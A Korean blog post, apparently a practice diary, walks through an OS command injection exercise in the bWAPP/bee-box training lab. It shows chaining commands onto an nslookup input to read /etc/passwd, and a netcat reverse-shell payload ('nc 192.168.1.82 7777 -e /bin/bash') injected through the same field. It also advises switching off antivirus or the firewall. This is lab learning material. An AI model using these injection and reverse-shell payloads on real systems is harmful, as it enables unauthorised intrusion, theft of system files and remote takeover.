owasp 실습(bwapp)-6 (OS Command Injection) + netcat(리버스 쉘)

2020. 12. 8. 14:59·Web hacking

eternallybored.org/misc/netcat/

 

netcat 1.11 for Win32/Win64

 

eternallybored.org

 

 

 

 

 

netcat 1.11 을 다운하여 푼다.

 

백신에 걸리면 예외처리나 방화벽을 끄세요

 

 

 

검사제외하기

 

 

 

----------------------------

 

 

 

 

 

 

 

nelookup www.nsa.gov 처럼 nslookup명령어만 사용이된디.

이걸 쉽게 볼려면 커맨드창을 띄운다(cmd)

 

 

 

nslookup 내가원하는url 주소

 

nslookup www.google.co.kr

 

 

 

 

nslookup www.nav.gov;ls

 

; 를추가 하면 두개를 이어서 출력하지만

 

 

nslookup www.nav.gov | ls

 

ls만 실행이된다.

 

 

 

 

 

 

 

 

 

 

 

 

www.nsa.gov;cat /etc/passwd 

이거나

www.ns.gov;cat  /etc/passwd

이렇게 하면

 

nslookup www.na.gov;

nslookup www.na.gov|

둘중 하나를 쓰고 뒤에 원하는명령어를 써서

성공하엿다

 

 

 

-----------------------------------------------------

 

 

 

 

 

 

 

 

 

 

 

 

 

원격접속이 붙는 쉘을 실행하면된다.

 

 

nc -lvp 7777

 

-> 윈도우) 7777을 포트번호로 하는 리스닝 상태로 실행

 

 

 

 

 

 

 

 

윈도우(cmd)에서는

nc -lvp 7777

포트를 열고 리스닝상태 진행을 하구

 

 

bee-box(홈페이지 입력창에서는)

 

bee-box) nc 윈도우ip 7777 -e /bin/bash

 

                192.168.1.82(윈도우ip)

 

 

nc 192.168.1.82 7777 -e /bin/bash

 

 

www.nsa.gov|nc 192.168.1.82 7777 -e /bin/bash

 

 

입력을 하면된다.

 

 

 

 

 

 

성공하엿고

결국에는 cmd 에서 beebox 의 쉘을 실행할수있다.

 

'Web hacking' 카테고리의 다른 글

owasp 실습(bwapp)-8 (Remote & Local File Inclusion (RFI/LFI)) 서버 다운로드 취약점  (0) 2020.12.08
owasp 실습(bwapp)-7 (php code injection) + netcat(리버스 쉘)  (0) 2020.12.08
owasp 실습(bwapp)-5 (SQL Injection - Stored (Blog))  (0) 2020.12.08
owasp 실습(bwapp)-4 (XML/XPath Injection (Login Form)  (0) 2020.12.08
owasp 실습(bwapp) -3 (sql injection blind (ws/soap)  (0) 2020.12.08
'Web hacking' 카테고리의 다른 글
  • owasp 실습(bwapp)-8 (Remote & Local File Inclusion (RFI/LFI)) 서버 다운로드 취약점
  • owasp 실습(bwapp)-7 (php code injection) + netcat(리버스 쉘)
  • owasp 실습(bwapp)-5 (SQL Injection - Stored (Blog))
  • owasp 실습(bwapp)-4 (XML/XPath Injection (Login Form)
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    owasp 실습(bwapp)-6 (OS Command Injection) + netcat(리버스 쉘)
    상단으로

    티스토리툴바